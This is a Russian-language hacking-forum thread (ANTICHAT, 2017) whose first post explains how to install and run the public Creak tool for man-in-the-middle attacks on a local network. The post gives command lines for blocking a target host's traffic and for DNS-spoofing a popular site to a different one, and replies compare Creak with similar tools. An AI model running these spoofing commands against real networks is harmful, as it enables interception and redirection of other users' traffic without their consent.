HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.11.2017, 16:18
vag4b0nd
Участник форума
Регистрация: 04.11.2017
Сообщений: 299
С нами: 4485744

Репутация: 0
По умолчанию

Всем привет дорогие друзья!

Сегодня мы поговорим о скрипте Creak. Он выполняет некоторые очень известные нападения MITM атакой. И еще, заранее извиняюсь за не четкие скрины.

Некоторые из возможностей:
  • Запрещает возможность навигации и загрузки целевого хоста в локальной сети.
  • DNS спуфинг
  • ARP спуфинг
  • Генерация нового MAC адреса для проведения атаки.
  • Кража TCP сеансов по десинхронизации.
И многое другое. А теперь давайте установим Creak
Имеются зависимости:
  1. Pcap библиотеки
  2. libdnet (dnetмодуль)
  3. Может быть необходим scapy.

Код:


Код:
1. pip install dpkt
2. pip install pypcap
А вот с библиотекой dnet получается немного сложнее.

Код:


Код:
1. git clone https://github.com/dugsong/libdnet
2. ./configure && make && make install
3. cd python && python setup.py build
(установка описана в файле /libdnet/INSTALL)
Немного помучавшись с зависимостями идем далее.

Если кто знает как можно проще установить libdnet, напишите в комментарии))


Устанавливаем

Код:


Код:
1. git clone https://github.com/codepr/creak.git
2. cd creak
3. python setup.py install
4. chmod +x creak.py



Если ты лентяй, то специально для тебя в конце статьи простенький bash скрипт для установки зависимостей и самого скрипта(о всех ошибках пишите в комментариях под статьей ибо скрипт для установки мой)


Посмотрим весь функционал.
Код:


Код:
./ creak.py --help





Теперь перейдем непосредственно к работе.

Давайте посмотрим какой интерфейс у нас на карте(название). Те кто не помнит, это для вас

Код:


Код:
iwconfig






1. По умолчанию creak запрещает трафик на определенный хост. Для этого просто задаем имя целевого хоста

Код:


Код:
./creak.py -t 192.168.1.2 wlan0




Также creak можно не задавать таргет опцией, тогда creak сам спросит его у вас




2. А как же без DNS спуфинга друзья?

Код:


Код:
./creak.py -t 192.168.1.2 -a vk.com -r античат wlan0
В моем примере vk.com это тот сайт который будет посещать пользователь, codeby.netэто сайт на который пользователя перенаправит при посещении сайта vk.com

(Теперь будем рекламировать кодеби подменой днс)

Также для своей безопасности можете добавить опцию " -x" которая проведетspoof mac addressт.е. сменит ваш MAC.

А на этом все друзья! Изучайте и пользуйтесь))

Скрипт очень полезен, но имеются некоторые баги которые легко исправимы.


Мой утановщик можно скачать тут -
 
Ответить с цитированием

  #2  
Старый 16.11.2017, 16:29
valerian38
Новичок
Регистрация: 20.07.2016
Сообщений: 0
С нами: 5165072

Репутация: 0
По умолчанию

Цитата:

AL04E сказал(а):

Он выполняет некоторые очень известные нападения MITM атакой.

Это работает только в локальной сети?
 
Ответить с цитированием

  #3  
Старый 16.11.2017, 16:31
vag4b0nd
Участник форума
Регистрация: 04.11.2017
Сообщений: 299
С нами: 4485744

Репутация: 0
По умолчанию

Цитата:

valerian38 сказал(а):

Это работает только в локальной сети?

Да. А что?
 
Ответить с цитированием

  #4  
Старый 16.11.2017, 16:33
valerian38
Новичок
Регистрация: 20.07.2016
Сообщений: 0
С нами: 5165072

Репутация: 0
По умолчанию

Цитата:

AL04E сказал(а):

Да. А что?

Просто уточнил.
 
Ответить с цитированием

  #5  
Старый 16.11.2017, 17:26
OBLIVIONNN
Новичок
Регистрация: 22.08.2017
Сообщений: 0
С нами: 4592342

Репутация: 0
По умолчанию

Простите а чем он отличается допустим от Bettercap или MITMf ? Есть какие нибудь +ы
 
Ответить с цитированием

  #6  
Старый 16.11.2017, 17:43
vag4b0nd
Участник форума
Регистрация: 04.11.2017
Сообщений: 299
С нами: 4485744

Репутация: 0
По умолчанию

Цитата:

OBLIVIONNN сказал(а):

Простите а чем он отличается допустим от Bettercap или MITMf ? Есть какие нибудь +ы

Инструмент в копилку.
А так, особо не отличен от выше преречисленных тобой инструментов. Только немного проще
 
Ответить с цитированием

  #7  
Старый 16.11.2017, 18:47
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Цитата:

OBLIVIONNN сказал(а):

Простите а чем он отличается допустим от Bettercap или MITMf ? Есть какие нибудь +ы

Особых отличай у многих инструментов нет, кроме как одни завелись на системе, а другие нагадили в терминал и послали в лес пользователя
 
Ответить с цитированием

  #8  
Старый 16.11.2017, 23:58
nikos
Новичок
Регистрация: 25.12.2016
Сообщений: 0
С нами: 4938696

Репутация: 0
По умолчанию

Хороший инструмент
 
Ответить с цитированием

  #9  
Старый 17.11.2017, 10:15
PingVinich
Новичок
Регистрация: 19.03.2017
Сообщений: 0
С нами: 4817306

Репутация: 0
По умолчанию

Как по мне, XeroSploit лучше в этом плане. Но да ладно, инструмент справляется с поставленной задачей. Спасибо за статью.
 
Ответить с цитированием

  #10  
Старый 17.11.2017, 13:09
sinner67
Новичок
Регистрация: 24.03.2017
Сообщений: 0
С нами: 4809713

Репутация: 0
По умолчанию

Цитата:

AL04E сказал(а):

(Теперь будем рекламировать кодеби подменой днс)

не просто на античат , а сразу на эту статью ^_^ что бы человек, осознав что с ним произошло, стал вникать в эту тему глубже))) Загипнотизируем нового последователя античат
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.